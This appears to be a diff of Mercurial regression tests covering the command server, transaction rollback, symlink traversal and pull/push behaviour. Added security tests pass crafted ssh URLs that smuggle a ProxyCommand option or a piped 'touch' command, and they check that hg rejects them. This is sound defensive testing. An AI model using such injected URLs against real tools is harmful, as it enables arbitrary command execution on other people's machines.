686 $ cd repo
686 $ cd repo
687 $ hg serve --cmdserver pipe -R ../nonexistent
687 $ hg serve --cmdserver pipe -R ../nonexistent
688 abort: repository ../nonexistent not found!
688 abort: repository ../nonexistent not found!
689 [255]
689 [255]
690 $ cd ..
690 $ cd ..
691
691
692
692
693 unix domain socket:
693 unix domain socket:
694
694
695 $ cd repo
695 $ cd repo
696 $ hg update -q
696 $ hg update -q
697
697
698 #if unix-socket unix-permissions
698 #if unix-socket unix-permissions
699
699
700 >>> from __future__ import print_function
700 >>> from __future__ import print_function
701 >>> from hgclient import unixserver, readchannel, runcommand, check, stringio
701 >>> from hgclient import unixserver, readchannel, runcommand, check, stringio
702 >>> server = unixserver('.hg/server.sock', '.hg/server.log')
702 >>> server = unixserver('.hg/server.sock', '.hg/server.log')
703 >>> def hellomessage(conn):
703 >>> def hellomessage(conn):
704 ... ch, data = readchannel(conn)
704 ... ch, data = readchannel(conn)
705 ... print('%c, %r' % (ch, data))
705 ... print('%c, %r' % (ch, data))
706 ... runcommand(conn, ['id'])
706 ... runcommand(conn, ['id'])
707 >>> check(hellomessage, server.connect)
707 >>> check(hellomessage, server.connect)
708 o, 'capabilities: getencoding runcommand\nencoding: *\npid: *' (glob)
708 o, 'capabilities: getencoding runcommand\nencoding: *\npid: *' (glob)
709 *** runcommand id
709 *** runcommand id
710 eff892de26ec tip bm1/bm2/bm3
710 eff892de26ec tip bm1/bm2/bm3
711 >>> def unknowncommand(conn):
711 >>> def unknowncommand(conn):
712 ... readchannel(conn)
712 ... readchannel(conn)
713 ... conn.stdin.write('unknowncommand\n')
713 ... conn.stdin.write('unknowncommand\n')
714 >>> check(unknowncommand, server.connect) # error sent to server.log
714 >>> check(unknowncommand, server.connect) # error sent to server.log
715 >>> def serverinput(conn):
715 >>> def serverinput(conn):
716 ... readchannel(conn)
716 ... readchannel(conn)
717 ... patch = """
717 ... patch = """
718 ... # HG changeset patch
718 ... # HG changeset patch
719 ... # User test
719 ... # User test
720 ... # Date 0 0
720 ... # Date 0 0
721 ... 2
721 ... 2
722 ...
722 ...
723 ... diff -r eff892de26ec -r 1ed24be7e7a0 a
723 ... diff -r eff892de26ec -r 1ed24be7e7a0 a
724 ... --- a/a
724 ... --- a/a
725 ... +++ b/a
725 ... +++ b/a
726 ... @@ -1,1 +1,2 @@
726 ... @@ -1,1 +1,2 @@
727 ... 1
727 ... 1
728 ... +2
728 ... +2
729 ... """
729 ... """
730 ... runcommand(conn, ['import', '-'], input=stringio(patch))
730 ... runcommand(conn, ['import', '-'], input=stringio(patch))
731 ... runcommand(conn, ['log', '-rtip', '-q'])
731 ... runcommand(conn, ['log', '-rtip', '-q'])
732 >>> check(serverinput, server.connect)
732 >>> check(serverinput, server.connect)
733 *** runcommand import -
733 *** runcommand import -
734 applying patch from stdin
734 applying patch from stdin
735 *** runcommand log -rtip -q
735 *** runcommand log -rtip -q
736 2:1ed24be7e7a0
736 2:1ed24be7e7a0
737 >>> server.shutdown()
737 >>> server.shutdown()
738
738
739 $ cat .hg/server.log
739 $ cat .hg/server.log
740 listening at .hg/server.sock
740 listening at .hg/server.sock
741 abort: unknown command unknowncommand
741 abort: unknown command unknowncommand
742 killed!
742 killed!
743 $ rm .hg/server.log
743 $ rm .hg/server.log
744
744
745 if server crashed before hello, traceback will be sent to 'e' channel as
745 if server crashed before hello, traceback will be sent to 'e' channel as
746 last ditch:
746 last ditch:
747
747
748 $ cat <<EOF >> .hg/hgrc
748 $ cat <<EOF >> .hg/hgrc
749 > [cmdserver]
749 > [cmdserver]
750 > log = inexistent/path.log
750 > log = inexistent/path.log
751 > EOF
751 > EOF
752 >>> from __future__ import print_function
752 >>> from __future__ import print_function
753 >>> from hgclient import unixserver, readchannel, check
753 >>> from hgclient import unixserver, readchannel, check
754 >>> server = unixserver('.hg/server.sock', '.hg/server.log')
754 >>> server = unixserver('.hg/server.sock', '.hg/server.log')
755 >>> def earlycrash(conn):
755 >>> def earlycrash(conn):
756 ... while True:
756 ... while True:
757 ... try:
757 ... try:
758 ... ch, data = readchannel(conn)
758 ... ch, data = readchannel(conn)
759 ... if not data.startswith(' '):
759 ... if not data.startswith(' '):
760 ... print('%c, %r' % (ch, data))
760 ... print('%c, %r' % (ch, data))
761 ... except EOFError:
761 ... except EOFError:
762 ... break
762 ... break
763 >>> check(earlycrash, server.connect)
763 >>> check(earlycrash, server.connect)
764 e, 'Traceback (most recent call last):\n'
764 e, 'Traceback (most recent call last):\n'
765 e, "IOError: *" (glob)
765 e, "IOError: *" (glob)
766 >>> server.shutdown()
766 >>> server.shutdown()
767
767
768 $ cat .hg/server.log | grep -v '^ '
768 $ cat .hg/server.log | grep -v '^ '
769 listening at .hg/server.sock
769 listening at .hg/server.sock
770 Traceback (most recent call last):
770 Traceback (most recent call last):
771 IOError: * (glob)
771 IOError: * (glob)
772 killed!
772 killed!
773 #endif
773 #endif
774 #if no-unix-socket
774 #if no-unix-socket
775
775
776 $ hg serve --cmdserver unix -a .hg/server.sock
776 $ hg serve --cmdserver unix -a .hg/server.sock
777 abort: unsupported platform
777 abort: unsupported platform
778 [255]
778 [255]
779
779
780 #endif
780 #endif
781
781
782 $ cd ..
782 $ cd ..
783
783
784 Test that accessing to invalid changelog cache is avoided at
784 Test that accessing to invalid changelog cache is avoided at
785 subsequent operations even if repo object is reused even after failure
785 subsequent operations even if repo object is reused even after failure
786 of transaction (see 0a7610758c42 also)
786 of transaction (see 0a7610758c42 also)
787
787
788 "hg log" after failure of transaction is needed to detect invalid
788 "hg log" after failure of transaction is needed to detect invalid
789 cache in repoview: this can't detect by "hg verify" only.
789 cache in repoview: this can't detect by "hg verify" only.
790
790
791 Combination of "finalization" and "empty-ness of changelog" (2 x 2 =
791 Combination of "finalization" and "empty-ness of changelog" (2 x 2 =
792 4) are tested, because '00changelog.i' are differently changed in each
792 4) are tested, because '00changelog.i' are differently changed in each
793 cases.
793 cases.
794
794
795 $ cat > $TESTTMP/failafterfinalize.py <<EOF
795 $ cat > $TESTTMP/failafterfinalize.py <<EOF
796 > # extension to abort transaction after finalization forcibly
796 > # extension to abort transaction after finalization forcibly
797 > from mercurial import commands, error, extensions, lock as lockmod
797 > from mercurial import commands, error, extensions, lock as lockmod
798 > def fail(tr):
798 > def fail(tr):
799 > raise error.Abort('fail after finalization')
799 > raise error.Abort('fail after finalization')
800 > def reposetup(ui, repo):
800 > def reposetup(ui, repo):
801 > class failrepo(repo.__class__):
801 > class failrepo(repo.__class__):
802 > def commitctx(self, ctx, error=False):
802 > def commitctx(self, ctx, error=False):
803 > if self.ui.configbool('failafterfinalize', 'fail'):
803 > if self.ui.configbool('failafterfinalize', 'fail'):
804 > # 'sorted()' by ASCII code on category names causes
804 > # 'sorted()' by ASCII code on category names causes
805 > # invoking 'fail' after finalization of changelog
805 > # invoking 'fail' after finalization of changelog
806 > # using "'cl-%i' % id(self)" as category name
806 > # using "'cl-%i' % id(self)" as category name
807 > self.currenttransaction().addfinalize('zzzzzzzz', fail)
807 > self.currenttransaction().addfinalize('zzzzzzzz', fail)
808 > return super(failrepo, self).commitctx(ctx, error)
808 > return super(failrepo, self).commitctx(ctx, error)
809 > repo.__class__ = failrepo
809 > repo.__class__ = failrepo
810 > EOF
810 > EOF
811
811
812 $ hg init repo3
812 $ hg init repo3
813 $ cd repo3
813 $ cd repo3
814
814
815 $ cat <<EOF >> $HGRCPATH
815 $ cat <<EOF >> $HGRCPATH
816 > [ui]
816 > [ui]
817 > logtemplate = {rev} {desc|firstline} ({files})\n
817 > logtemplate = {rev} {desc|firstline} ({files})\n
818 >
818 >
819 > [extensions]
819 > [extensions]
820 > failafterfinalize = $TESTTMP/failafterfinalize.py
820 > failafterfinalize = $TESTTMP/failafterfinalize.py
821 > EOF
821 > EOF
822
822
823 - test failure with "empty changelog"
823 - test failure with "empty changelog"
824
824
825 $ echo foo > foo
825 $ echo foo > foo
826 $ hg add foo
826 $ hg add foo
827
827
828 (failure before finalization)
828 (failure before finalization)
829
829
830 >>> from hgclient import readchannel, runcommand, check
830 >>> from hgclient import readchannel, runcommand, check
831 >>> @check
831 >>> @check
832 ... def abort(server):
832 ... def abort(server):
833 ... readchannel(server)
833 ... readchannel(server)
834 ... runcommand(server, ['commit',
834 ... runcommand(server, ['commit',
835 ... '--config', 'hooks.pretxncommit=false',
835 ... '--config', 'hooks.pretxncommit=false',
836 ... '-mfoo'])
836 ... '-mfoo'])
837 ... runcommand(server, ['log'])
837 ... runcommand(server, ['log'])
838 ... runcommand(server, ['verify', '-q'])
838 ... runcommand(server, ['verify', '-q'])
839 *** runcommand commit --config hooks.pretxncommit=false -mfoo
839 *** runcommand commit --config hooks.pretxncommit=false -mfoo
840 transaction abort!
840 transaction abort!
841 rollback completed
841 rollback completed
842 abort: pretxncommit hook exited with status 1
842 abort: pretxncommit hook exited with status 1
843 [255]
843 [255]
844 *** runcommand log
844 *** runcommand log
845 *** runcommand verify -q
845 *** runcommand verify -q
846
846
847 (failure after finalization)
847 (failure after finalization)
848
848
849 >>> from hgclient import readchannel, runcommand, check
849 >>> from hgclient import readchannel, runcommand, check
850 >>> @check
850 >>> @check
851 ... def abort(server):
851 ... def abort(server):
852 ... readchannel(server)
852 ... readchannel(server)
853 ... runcommand(server, ['commit',
853 ... runcommand(server, ['commit',
854 ... '--config', 'failafterfinalize.fail=true',
854 ... '--config', 'failafterfinalize.fail=true',
855 ... '-mfoo'])
855 ... '-mfoo'])
856 ... runcommand(server, ['log'])
856 ... runcommand(server, ['log'])
857 ... runcommand(server, ['verify', '-q'])
857 ... runcommand(server, ['verify', '-q'])
858 *** runcommand commit --config failafterfinalize.fail=true -mfoo
858 *** runcommand commit --config failafterfinalize.fail=true -mfoo
859 transaction abort!
859 transaction abort!
860 rollback completed
860 rollback completed
861 abort: fail after finalization
861 abort: fail after finalization
862 [255]
862 [255]
863 *** runcommand log
863 *** runcommand log
864 *** runcommand verify -q
864 *** runcommand verify -q
865
865
866 - test failure with "not-empty changelog"
866 - test failure with "not-empty changelog"
867
867
868 $ echo bar > bar
868 $ echo bar > bar
869 $ hg add bar
869 $ hg add bar
870 $ hg commit -mbar bar
870 $ hg commit -mbar bar
871
871
872 (failure before finalization)
872 (failure before finalization)
873
873
874 >>> from hgclient import readchannel, runcommand, check
874 >>> from hgclient import readchannel, runcommand, check
875 >>> @check
875 >>> @check
876 ... def abort(server):
876 ... def abort(server):
877 ... readchannel(server)
877 ... readchannel(server)
878 ... runcommand(server, ['commit',
878 ... runcommand(server, ['commit',
879 ... '--config', 'hooks.pretxncommit=false',
879 ... '--config', 'hooks.pretxncommit=false',
880 ... '-mfoo', 'foo'])
880 ... '-mfoo', 'foo'])
881 ... runcommand(server, ['log'])
881 ... runcommand(server, ['log'])
882 ... runcommand(server, ['verify', '-q'])
882 ... runcommand(server, ['verify', '-q'])
883 *** runcommand commit --config hooks.pretxncommit=false -mfoo foo
883 *** runcommand commit --config hooks.pretxncommit=false -mfoo foo
884 transaction abort!
884 transaction abort!
885 rollback completed
885 rollback completed
886 abort: pretxncommit hook exited with status 1
886 abort: pretxncommit hook exited with status 1
887 [255]
887 [255]
888 *** runcommand log
888 *** runcommand log
889 0 bar (bar)
889 0 bar (bar)
890 *** runcommand verify -q
890 *** runcommand verify -q
891
891
892 (failure after finalization)
892 (failure after finalization)
893
893
894 >>> from hgclient import readchannel, runcommand, check
894 >>> from hgclient import readchannel, runcommand, check
895 >>> @check
895 >>> @check
896 ... def abort(server):
896 ... def abort(server):
897 ... readchannel(server)
897 ... readchannel(server)
898 ... runcommand(server, ['commit',
898 ... runcommand(server, ['commit',
899 ... '--config', 'failafterfinalize.fail=true',
899 ... '--config', 'failafterfinalize.fail=true',
900 ... '-mfoo', 'foo'])
900 ... '-mfoo', 'foo'])
901 ... runcommand(server, ['log'])
901 ... runcommand(server, ['log'])
902 ... runcommand(server, ['verify', '-q'])
902 ... runcommand(server, ['verify', '-q'])
903 *** runcommand commit --config failafterfinalize.fail=true -mfoo foo
903 *** runcommand commit --config failafterfinalize.fail=true -mfoo foo
904 transaction abort!
904 transaction abort!
905 rollback completed
905 rollback completed
906 abort: fail after finalization
906 abort: fail after finalization
907 [255]
907 [255]
908 *** runcommand log
908 *** runcommand log
909 0 bar (bar)
909 0 bar (bar)
910 *** runcommand verify -q
910 *** runcommand verify -q
911
912 $ cd ..
913
914 Test symlink traversal over cached audited paths:
915 -------------------------------------------------
916
917 #if symlink
918
919 set up symlink hell
920
921 $ mkdir merge-symlink-out
922 $ hg init merge-symlink
923 $ cd merge-symlink
924 $ touch base
925 $ hg commit -qAm base
926 $ ln -s ../merge-symlink-out a
927 $ hg commit -qAm 'symlink a -> ../merge-symlink-out'
928 $ hg up -q 0
929 $ mkdir a
930 $ touch a/poisoned
931 $ hg commit -qAm 'file a/poisoned'
932 $ hg log -G -T '{rev}: {desc}\n'
933 @ 2: file a/poisoned
934 |
935 | o 1: symlink a -> ../merge-symlink-out
936 |/
937 o 0: base
938
939
940 try trivial merge after update: cache of audited paths should be discarded,
941 and the merge should fail (issue5628)
942
943 $ hg up -q null
944 >>> from hgclient import readchannel, runcommand, check
945 >>> @check
946 ... def merge(server):
947 ... readchannel(server)
948 ... # audit a/poisoned as a good path
949 ... runcommand(server, ['up', '-qC', '2'])
950 ... runcommand(server, ['up', '-qC', '1'])
951 ... # here a is a symlink, so a/poisoned is bad
952 ... runcommand(server, ['merge', '2'])
953 *** runcommand up -qC 2
954 *** runcommand up -qC 1
955 *** runcommand merge 2
956 abort: path 'a/poisoned' traverses symbolic link 'a'
957 [255]
958 $ ls ../merge-symlink-out
959
960 cache of repo.auditor should be discarded, so matcher would never traverse
961 symlinks:
962
963 $ hg up -qC 0
964 $ touch ../merge-symlink-out/poisoned
965 >>> from hgclient import readchannel, runcommand, check
966 >>> @check
967 ... def files(server):
968 ... readchannel(server)
969 ... runcommand(server, ['up', '-qC', '2'])
970 ... # audit a/poisoned as a good path
971 ... runcommand(server, ['files', 'a/poisoned'])
972 ... runcommand(server, ['up', '-qC', '0'])
973 ... runcommand(server, ['up', '-qC', '1'])
974 ... # here 'a' is a symlink, so a/poisoned should be warned
975 ... runcommand(server, ['files', 'a/poisoned'])
976 *** runcommand up -qC 2
977 *** runcommand files a/poisoned
978 a/poisoned
979 *** runcommand up -qC 0
980 *** runcommand up -qC 1
981 *** runcommand files a/poisoned
982 abort: path 'a/poisoned' traverses symbolic link 'a'
983 [255]
984
985 $ cd ..
986
987 #endif
@@ -1,108 +1,134 b''
1 #require serve
1 #require serve
2
2
3 $ hg init test
3 $ hg init test
4 $ cd test
4 $ cd test
5
5
6 $ echo foo>foo
6 $ echo foo>foo
7 $ hg addremove
7 $ hg addremove
8 adding foo
8 adding foo
9 $ hg commit -m 1
9 $ hg commit -m 1
10
10
11 $ hg verify
11 $ hg verify
12 checking changesets
12 checking changesets
13 checking manifests
13 checking manifests
14 crosschecking files in changesets and manifests
14 crosschecking files in changesets and manifests
15 checking files
15 checking files
16 1 files, 1 changesets, 1 total revisions
16 1 files, 1 changesets, 1 total revisions
17
17
18 $ hg serve -p $HGPORT -d --pid-file=hg.pid
18 $ hg serve -p $HGPORT -d --pid-file=hg.pid
19 $ cat hg.pid >> $DAEMON_PIDS
19 $ cat hg.pid >> $DAEMON_PIDS
20 $ cd ..
20 $ cd ..
21
21
22 $ hg clone --pull http://foo:bar@localhost:$HGPORT/ copy
22 $ hg clone --pull http://foo:bar@localhost:$HGPORT/ copy
23 requesting all changes
23 requesting all changes
24 adding changesets
24 adding changesets
25 adding manifests
25 adding manifests
26 adding file changes
26 adding file changes
27 added 1 changesets with 1 changes to 1 files
27 added 1 changesets with 1 changes to 1 files
28 updating to branch default
28 updating to branch default
29 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
29 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
30
30
31 $ cd copy
31 $ cd copy
32 $ hg verify
32 $ hg verify
33 checking changesets
33 checking changesets
34 checking manifests
34 checking manifests
35 crosschecking files in changesets and manifests
35 crosschecking files in changesets and manifests
36 checking files
36 checking files
37 1 files, 1 changesets, 1 total revisions
37 1 files, 1 changesets, 1 total revisions
38
38
39 $ hg co
39 $ hg co
40 0 files updated, 0 files merged, 0 files removed, 0 files unresolved
40 0 files updated, 0 files merged, 0 files removed, 0 files unresolved
41 $ cat foo
41 $ cat foo
42 foo
42 foo
43
43
44 $ hg manifest --debug
44 $ hg manifest --debug
45 2ed2a3912a0b24502043eae84ee4b279c18b90dd 644 foo
45 2ed2a3912a0b24502043eae84ee4b279c18b90dd 644 foo
46
46
47 $ hg pull
47 $ hg pull
48 pulling from http://foo@localhost:$HGPORT/
48 pulling from http://foo@localhost:$HGPORT/
49 searching for changes
49 searching for changes
50 no changes found
50 no changes found
51
51
52 $ hg rollback --dry-run --verbose
52 $ hg rollback --dry-run --verbose
53 repository tip rolled back to revision -1 (undo pull: http://foo:***@localhost:$HGPORT/)
53 repository tip rolled back to revision -1 (undo pull: http://foo:***@localhost:$HGPORT/)
54
54
55 Test pull of non-existing 20 character revision specification, making sure plain ascii identifiers
55 Test pull of non-existing 20 character revision specification, making sure plain ascii identifiers
56 not are encoded like a node:
56 not are encoded like a node:
57
57
58 $ hg pull -r 'xxxxxxxxxxxxxxxxxxxy'
58 $ hg pull -r 'xxxxxxxxxxxxxxxxxxxy'
59 pulling from http://foo@localhost:$HGPORT/
59 pulling from http://foo@localhost:$HGPORT/
60 abort: unknown revision 'xxxxxxxxxxxxxxxxxxxy'!
60 abort: unknown revision 'xxxxxxxxxxxxxxxxxxxy'!
61 [255]
61 [255]
62 $ hg pull -r 'xxxxxxxxxxxxxxxxxx y'
62 $ hg pull -r 'xxxxxxxxxxxxxxxxxx y'
63 pulling from http://foo@localhost:$HGPORT/
63 pulling from http://foo@localhost:$HGPORT/
64 abort: unknown revision '7878787878787878787878787878787878782079'!
64 abort: unknown revision '7878787878787878787878787878787878782079'!
65 [255]
65 [255]
66
66
67 Issue622: hg init && hg pull -u URL doesn't checkout default branch
67 Issue622: hg init && hg pull -u URL doesn't checkout default branch
68
68
69 $ cd ..
69 $ cd ..
70 $ hg init empty
70 $ hg init empty
71 $ cd empty
71 $ cd empty
72 $ hg pull -u ../test
72 $ hg pull -u ../test
73 pulling from ../test
73 pulling from ../test
74 requesting all changes
74 requesting all changes
75 adding changesets
75 adding changesets
76 adding manifests
76 adding manifests
77 adding file changes
77 adding file changes
78 added 1 changesets with 1 changes to 1 files
78 added 1 changesets with 1 changes to 1 files
79 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
79 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
80
80
81 Test 'file:' uri handling:
81 Test 'file:' uri handling:
82
82
83 $ hg pull -q file://../test-does-not-exist
83 $ hg pull -q file://../test-does-not-exist
84 abort: file:// URLs can only refer to localhost
84 abort: file:// URLs can only refer to localhost
85 [255]
85 [255]
86
86
87 $ hg pull -q file://../test
87 $ hg pull -q file://../test
88 abort: file:// URLs can only refer to localhost
88 abort: file:// URLs can only refer to localhost
89 [255]
89 [255]
90
90
91 MSYS changes 'file:' into 'file;'
91 MSYS changes 'file:' into 'file;'
92
92
93 #if no-msys
93 #if no-msys
94 $ hg pull -q file:../test # no-msys
94 $ hg pull -q file:../test # no-msys
95 #endif
95 #endif
96
96
97 It's tricky to make file:// URLs working on every platform with
97 It's tricky to make file:// URLs working on every platform with
98 regular shell commands.
98 regular shell commands.
99
99
100 $ URL=`$PYTHON -c "import os; print 'file://foobar' + ('/' + os.getcwd().replace(os.sep, '/')).replace('//', '/') + '/../test'"`
100 $ URL=`$PYTHON -c "import os; print 'file://foobar' + ('/' + os.getcwd().replace(os.sep, '/')).replace('//', '/') + '/../test'"`
101 $ hg pull -q "$URL"
101 $ hg pull -q "$URL"
102 abort: file:// URLs can only refer to localhost
102 abort: file:// URLs can only refer to localhost
103 [255]
103 [255]
104
104
105 $ URL=`$PYTHON -c "import os; print 'file://localhost' + ('/' + os.getcwd().replace(os.sep, '/')).replace('//', '/') + '/../test'"`
105 $ URL=`$PYTHON -c "import os; print 'file://localhost' + ('/' + os.getcwd().replace(os.sep, '/')).replace('//', '/') + '/../test'"`
106 $ hg pull -q "$URL"
106 $ hg pull -q "$URL"
107
107
108 SEC: check for unsafe ssh url
109
110 $ cat >> $HGRCPATH << EOF
111 > [ui]
112 > ssh = sh -c "read l; read l; read l"
113 > EOF
114
115 $ hg pull 'ssh://-oProxyCommand=touch${IFS}owned/path'
116 pulling from ssh://-oProxyCommand%3Dtouch%24%7BIFS%7Downed/path
117 abort: potentially unsafe url: 'ssh://-oProxyCommand=touch${IFS}owned/path'
118 [255]
119 $ hg pull 'ssh://%2DoProxyCommand=touch${IFS}owned/path'
120 pulling from ssh://-oProxyCommand%3Dtouch%24%7BIFS%7Downed/path
121 abort: potentially unsafe url: 'ssh://-oProxyCommand=touch${IFS}owned/path'
122 [255]
123 $ hg pull 'ssh://fakehost|touch${IFS}owned/path'
124 pulling from ssh://fakehost%7Ctouch%24%7BIFS%7Downed/path
125 abort: no suitable response from remote hg!
126 [255]
127 $ hg pull 'ssh://fakehost%7Ctouch%20owned/path'
128 pulling from ssh://fakehost%7Ctouch%20owned/path
129 abort: no suitable response from remote hg!
130 [255]
131
132 $ [ ! -f owned ] || echo 'you got owned'
133
108 $ cd ..
134 $ cd ..
@@ -1,318 +1,344 b''
1 ==================================
1 ==================================
2 Basic testing for the push command
2 Basic testing for the push command
3 ==================================
3 ==================================
4
4
5 Testing of the '--rev' flag
5 Testing of the '--rev' flag
6 ===========================
6 ===========================
7
7
8 $ hg init test-revflag
8 $ hg init test-revflag
9 $ hg -R test-revflag unbundle "$TESTDIR/bundles/remote.hg"
9 $ hg -R test-revflag unbundle "$TESTDIR/bundles/remote.hg"
10 adding changesets
10 adding changesets
11 adding manifests
11 adding manifests
12 adding file changes
12 adding file changes
13 added 9 changesets with 7 changes to 4 files (+1 heads)
13 added 9 changesets with 7 changes to 4 files (+1 heads)
14 (run 'hg heads' to see heads, 'hg merge' to merge)
14 (run 'hg heads' to see heads, 'hg merge' to merge)
15
15
16 $ for i in 0 1 2 3 4 5 6 7 8; do
16 $ for i in 0 1 2 3 4 5 6 7 8; do
17 > echo
17 > echo
18 > hg init test-revflag-"$i"
18 > hg init test-revflag-"$i"
19 > hg -R test-revflag push -r "$i" test-revflag-"$i"
19 > hg -R test-revflag push -r "$i" test-revflag-"$i"
20 > hg -R test-revflag-"$i" verify
20 > hg -R test-revflag-"$i" verify
21 > done
21 > done
22
22
23 pushing to test-revflag-0
23 pushing to test-revflag-0
24 searching for changes
24 searching for changes
25 adding changesets
25 adding changesets
26 adding manifests
26 adding manifests
27 adding file changes
27 adding file changes
28 added 1 changesets with 1 changes to 1 files
28 added 1 changesets with 1 changes to 1 files
29 checking changesets
29 checking changesets
30 checking manifests
30 checking manifests
31 crosschecking files in changesets and manifests
31 crosschecking files in changesets and manifests
32 checking files
32 checking files
33 1 files, 1 changesets, 1 total revisions
33 1 files, 1 changesets, 1 total revisions
34
34
35 pushing to test-revflag-1
35 pushing to test-revflag-1
36 searching for changes
36 searching for changes
37 adding changesets
37 adding changesets
38 adding manifests
38 adding manifests
39 adding file changes
39 adding file changes
40 added 2 changesets with 2 changes to 1 files
40 added 2 changesets with 2 changes to 1 files
41 checking changesets
41 checking changesets
42 checking manifests
42 checking manifests
43 crosschecking files in changesets and manifests
43 crosschecking files in changesets and manifests
44 checking files
44 checking files
45 1 files, 2 changesets, 2 total revisions
45 1 files, 2 changesets, 2 total revisions
46
46
47 pushing to test-revflag-2
47 pushing to test-revflag-2
48 searching for changes
48 searching for changes
49 adding changesets
49 adding changesets
50 adding manifests
50 adding manifests
51 adding file changes
51 adding file changes
52 added 3 changesets with 3 changes to 1 files
52 added 3 changesets with 3 changes to 1 files
53 checking changesets
53 checking changesets
54 checking manifests
54 checking manifests
55 crosschecking files in changesets and manifests
55 crosschecking files in changesets and manifests
56 checking files
56 checking files
57 1 files, 3 changesets, 3 total revisions
57 1 files, 3 changesets, 3 total revisions
58
58
59 pushing to test-revflag-3
59 pushing to test-revflag-3
60 searching for changes
60 searching for changes
61 adding changesets
61 adding changesets
62 adding manifests
62 adding manifests
63 adding file changes
63 adding file changes
64 added 4 changesets with 4 changes to 1 files
64 added 4 changesets with 4 changes to 1 files
65 checking changesets
65 checking changesets
66 checking manifests
66 checking manifests
67 crosschecking files in changesets and manifests
67 crosschecking files in changesets and manifests
68 checking files
68 checking files
69 1 files, 4 changesets, 4 total revisions
69 1 files, 4 changesets, 4 total revisions
70
70
71 pushing to test-revflag-4
71 pushing to test-revflag-4
72 searching for changes
72 searching for changes
73 adding changesets
73 adding changesets
74 adding manifests
74 adding manifests
75 adding file changes
75 adding file changes
76 added 2 changesets with 2 changes to 1 files
76 added 2 changesets with 2 changes to 1 files
77 checking changesets
77 checking changesets
78 checking manifests
78 checking manifests
79 crosschecking files in changesets and manifests
79 crosschecking files in changesets and manifests
80 checking files
80 checking files
81 1 files, 2 changesets, 2 total revisions
81 1 files, 2 changesets, 2 total revisions
82
82
83 pushing to test-revflag-5
83 pushing to test-revflag-5
84 searching for changes
84 searching for changes
85 adding changesets
85 adding changesets
86 adding manifests
86 adding manifests
87 adding file changes
87 adding file changes
88 added 3 changesets with 3 changes to 1 files
88 added 3 changesets with 3 changes to 1 files
89 checking changesets
89 checking changesets
90 checking manifests
90 checking manifests
91 crosschecking files in changesets and manifests
91 crosschecking files in changesets and manifests
92 checking files
92 checking files
93 1 files, 3 changesets, 3 total revisions
93 1 files, 3 changesets, 3 total revisions
94
94
95 pushing to test-revflag-6
95 pushing to test-revflag-6
96 searching for changes
96 searching for changes
97 adding changesets
97 adding changesets
98 adding manifests
98 adding manifests
99 adding file changes
99 adding file changes
100 added 4 changesets with 5 changes to 2 files
100 added 4 changesets with 5 changes to 2 files
101 checking changesets
101 checking changesets
102 checking manifests
102 checking manifests
103 crosschecking files in changesets and manifests
103 crosschecking files in changesets and manifests
104 checking files
104 checking files
105 2 files, 4 changesets, 5 total revisions
105 2 files, 4 changesets, 5 total revisions
106
106
107 pushing to test-revflag-7
107 pushing to test-revflag-7
108 searching for changes
108 searching for changes
109 adding changesets
109 adding changesets
110 adding manifests
110 adding manifests
111 adding file changes
111 adding file changes
112 added 5 changesets with 6 changes to 3 files
112 added 5 changesets with 6 changes to 3 files
113 checking changesets
113 checking changesets
114 checking manifests
114 checking manifests
115 crosschecking files in changesets and manifests
115 crosschecking files in changesets and manifests
116 checking files
116 checking files
117 3 files, 5 changesets, 6 total revisions
117 3 files, 5 changesets, 6 total revisions
118
118
119 pushing to test-revflag-8
119 pushing to test-revflag-8
120 searching for changes
120 searching for changes
121 adding changesets
121 adding changesets
122 adding manifests
122 adding manifests
123 adding file changes
123 adding file changes
124 added 5 changesets with 5 changes to 2 files
124 added 5 changesets with 5 changes to 2 files
125 checking changesets
125 checking changesets
126 checking manifests
126 checking manifests
127 crosschecking files in changesets and manifests
127 crosschecking files in changesets and manifests
128 checking files
128 checking files
129 2 files, 5 changesets, 5 total revisions
129 2 files, 5 changesets, 5 total revisions
130
130
131 $ cd test-revflag-8
131 $ cd test-revflag-8
132
132
133 $ hg pull ../test-revflag-7
133 $ hg pull ../test-revflag-7
134 pulling from ../test-revflag-7
134 pulling from ../test-revflag-7
135 searching for changes
135 searching for changes
136 adding changesets
136 adding changesets
137 adding manifests
137 adding manifests
138 adding file changes
138 adding file changes
139 added 4 changesets with 2 changes to 3 files (+1 heads)
139 added 4 changesets with 2 changes to 3 files (+1 heads)
140 (run 'hg heads' to see heads, 'hg merge' to merge)
140 (run 'hg heads' to see heads, 'hg merge' to merge)
141
141
142 $ hg verify
142 $ hg verify
143 checking changesets
143 checking changesets
144 checking manifests
144 checking manifests
145 crosschecking files in changesets and manifests
145 crosschecking files in changesets and manifests
146 checking files
146 checking files
147 4 files, 9 changesets, 7 total revisions
147 4 files, 9 changesets, 7 total revisions
148
148
149 $ cd ..
149 $ cd ..
150
150
151 Test server side validation during push
151 Test server side validation during push
152 =======================================
152 =======================================
153
153
154 $ hg init test-validation
154 $ hg init test-validation
155 $ cd test-validation
155 $ cd test-validation
156
156
157 $ cat > .hg/hgrc <<EOF
157 $ cat > .hg/hgrc <<EOF
158 > [server]
158 > [server]
159 > validate=1
159 > validate=1
160 > EOF
160 > EOF
161
161
162 $ echo alpha > alpha
162 $ echo alpha > alpha
163 $ echo beta > beta
163 $ echo beta > beta
164 $ hg addr
164 $ hg addr
165 adding alpha
165 adding alpha
166 adding beta
166 adding beta
167 $ hg ci -m 1
167 $ hg ci -m 1
168
168
169 $ cd ..
169 $ cd ..
170 $ hg clone test-validation test-validation-clone
170 $ hg clone test-validation test-validation-clone
171 updating to branch default
171 updating to branch default
172 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
172 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
173
173
174 Test spurious filelog entries:
174 Test spurious filelog entries:
175
175
176 $ cd test-validation-clone
176 $ cd test-validation-clone
177 $ echo blah >> beta
177 $ echo blah >> beta
178 $ cp .hg/store/data/beta.i tmp1
178 $ cp .hg/store/data/beta.i tmp1
179 $ hg ci -m 2
179 $ hg ci -m 2
180 $ cp .hg/store/data/beta.i tmp2
180 $ cp .hg/store/data/beta.i tmp2
181 $ hg -q rollback
181 $ hg -q rollback
182 $ mv tmp2 .hg/store/data/beta.i
182 $ mv tmp2 .hg/store/data/beta.i
183 $ echo blah >> beta
183 $ echo blah >> beta
184 $ hg ci -m '2 (corrupt)'
184 $ hg ci -m '2 (corrupt)'
185
185
186 Expected to fail:
186 Expected to fail:
187
187
188 $ hg verify
188 $ hg verify
189 checking changesets
